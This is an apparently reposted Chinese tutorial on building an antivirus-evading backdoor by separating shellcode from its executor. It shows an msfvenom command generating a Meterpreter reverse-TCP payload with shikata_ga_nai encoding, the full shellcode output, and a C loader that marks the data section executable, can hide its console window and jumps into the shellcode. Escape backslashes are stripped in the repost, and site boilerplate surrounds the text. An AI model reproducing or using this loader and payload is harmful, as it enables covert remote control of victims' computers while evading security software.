Payload 实现后门分离免杀
发布时间:2021-03-06 14:04:54 所属栏目:系统 来源:网络整理
导读:众所周知,目前的杀毒软件的杀毒原理主要有三种方式,一种基于特征,一种基于行为,一种基于云查杀,其中云查杀的一些特点基本上也可以概括为特征码查杀,不管是哪一种杀毒软件,都会检查PE文件头,尤其是当后门程序越大时,越容易被查杀。 接下来我们将使用
|
副标题[/!--empirenews.page--]
众所周知,目前的杀毒软件的杀毒原理主要有三种方式,一种基于特征,一种基于行为,一种基于云查杀,其中云查杀的一些特点基本上也可以概括为特征码查杀,不管是哪一种杀毒软件,都会检查PE文件头,尤其是当后门程序越大时,越容易被查杀。 接下来我们将使用ShellCode和执行器分离的方式来实现免杀 通过C语言编译后门1.首先使用 [[email?protected] ~]# msfvenom -a x86 --platform Windows > -p windows/meterpreter/reverse_tcp > -b 'x00x0b' LHOST=192.168.1.7 LPORT=8888 -f c Found 11 compatible encoders Attempting to encode payload with 1 iterations of x86/shikata_ga_nai x86/shikata_ga_nai succeeded with size 368 (iteration=0) x86/shikata_ga_nai chosen with final size 368 Payload size: 368 bytes Final size of c file: 1571 bytes unsigned char buf[] = "xd9xc5xd9x74x24xf4xbax8bxfcx02xddx5ex2bxc9xb1" "x56x83xeexfcx31x56x14x03x56x9fx1exf7x21x77x5c" "xf8xd9x87x01x70x3cxb6x01xe6x34xe8xb1x6cx18x04" "x39x20x89x9fx4fxedxbex28xe5xcbxf1xa9x56x2fx93" "x29xa5x7cx73x10x66x71x72x55x9bx78x26x0exd7x2f" "xd7x3bxadxf3x5cx77x23x74x80xcfx42x55x17x44x1d" "x75x99x89x15x3cx81xcex10xf6x3ax24xeex09xebx75" "x0fxa5xd2xbaxe2xb7x13x7cx1dxc2x6dx7fxa0xd5xa9" "x02x7ex53x2axa4xf5xc3x96x55xd9x92x5dx59x96xd1" "x3ax7dx29x35x31x79xa2xb8x96x08xf0x9ex32x51xa2" "xbfx63x3fx05xbfx74xe0xfax65xfex0cxeex17x5dx58" "xc3x15x5ex98x4bx2dx2dxaaxd4x85xb9x86x9dx03x3d" "x9fx8axb3x91x27xdax4dx12x57xf2x89x46x07x6cx3b" "xe7xccx6cxc4x32x78x67x52x7dxd4x76xa5x15x26x79" "x8bx5dxafx9fx9bxcdxffx0fx5cxbexbfxffx34xd4x30" "xdfx25xd7x9bx48xcfx38x75x20x78xa0xdcxbax19x2d" "xcbxc6x1axa5xf9x37xd4x4ex88x2bx01x29x72xb4xd2" "xdcx72xdexd6x76x25x76xd5xafx01xd9x26x9ax12x1e" "xd8x5bx22x54xefxc9x0ax02x10x1ex8axd2x46x74x8a" "xbax3ex2cxd9xdfx40xf9x4ex4cxd5x02x26x20x7ex6b" "xc4x1fx48x34x37x4axcax33xc7x08xe5x9bxafxf2xb5" "x1bx2fx99x35x4cx47x56x19x63xa7x97xb0x2cxafx12" "x55x9ex4ex22x7cx7excex23x73x5bxe1x5exfcx5cx02" "x9fx14x39x03x9fx18x3fx38x49x21x35x7fx49x16x46" "xcaxecx3fxcdx34xa2x40xc4"; -a #指定payload目标框架 --platform #指定payload的目标平台 -p,--payload #指定需要使用的payload(攻击荷载) -f,--format #指定输出格式 (使用 --help-formats 来获取msf) -b 'x00x0b' #规避特殊字符串 2.将上面的ShellCode代码复制下来,打开 #include <stdio.h>
#include <windows.h>
//#pragma comment(linker,"/subsystem:"windows" /entry:"mainCRTStartup"") // 隐藏控制台窗口显示
#pragma comment(linker,"/INCREMENTAL:NO") // 减小编译体积
#pragma comment(linker,"/section:.data,RWE") // 启用数据段可读写
unsigned char shellcode[] =
"xd9xc5xd9x74x24xf4xbax8bxfcx02xddx5ex2bxc9xb1"
"x56x83xeexfcx31x56x14x03x56x9fx1exf7x21x77x5c"
"xf8xd9x87x01x70x3cxb6x01xe6x34xe8xb1x6cx18x04"
"x39x20x89x9fx4fxedxbex28xe5xcbxf1xa9x56x2fx93"
"x29xa5x7cx73x10x66x71x72x55x9bx78x26x0exd7x2f"
"xd7x3bxadxf3x5cx77x23x74x80xcfx42x55x17x44x1d"
"x75x99x89x15x3cx81xcex10xf6x3ax24xeex09xebx75"
"x0fxa5xd2xbaxe2xb7x13x7cx1dxc2x6dx7fxa0xd5xa9"
"x02x7ex53x2axa4xf5xc3x96x55xd9x92x5dx59x96xd1"
"x3ax7dx29x35x31x79xa2xb8x96x08xf0x9ex32x51xa2"
"xbfx63x3fx05xbfx74xe0xfax65xfex0cxeex17x5dx58"
"xc3x15x5ex98x4bx2dx2dxaaxd4x85xb9x86x9dx03x3d"
"x9fx8axb3x91x27xdax4dx12x57xf2x89x46x07x6cx3b"
"xe7xccx6cxc4x32x78x67x52x7dxd4x76xa5x15x26x79"
"x8bx5dxafx9fx9bxcdxffx0fx5cxbexbfxffx34xd4x30"
"xdfx25xd7x9bx48xcfx38x75x20x78xa0xdcxbax19x2d"
"xcbxc6x1axa5xf9x37xd4x4ex88x2bx01x29x72xb4xd2"
"xdcx72xdexd6x76x25x76xd5xafx01xd9x26x9ax12x1e"
"xd8x5bx22x54xefxc9x0ax02x10x1ex8axd2x46x74x8a"
"xbax3ex2cxd9xdfx40xf9x4ex4cxd5x02x26x20x7ex6b"
"xc4x1fx48x34x37x4axcax33xc7x08xe5x9bxafxf2xb5"
"x1bx2fx99x35x4cx47x56x19x63xa7x97xb0x2cxafx12"
"x55x9ex4ex22x7cx7excex23x73x5bxe1x5exfcx5cx02"
"x9fx14x39x03x9fx18x3fx38x49x21x35x7fx49x16x46"
"xcaxecx3fxcdx34xa2x40xc4";
int main(int argc,char **argv)
{
__asm
{
lea eax,shellcode
call eax
}
return 0;
}
(编辑:好传媒网) 【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容! |
站长推荐
热点阅读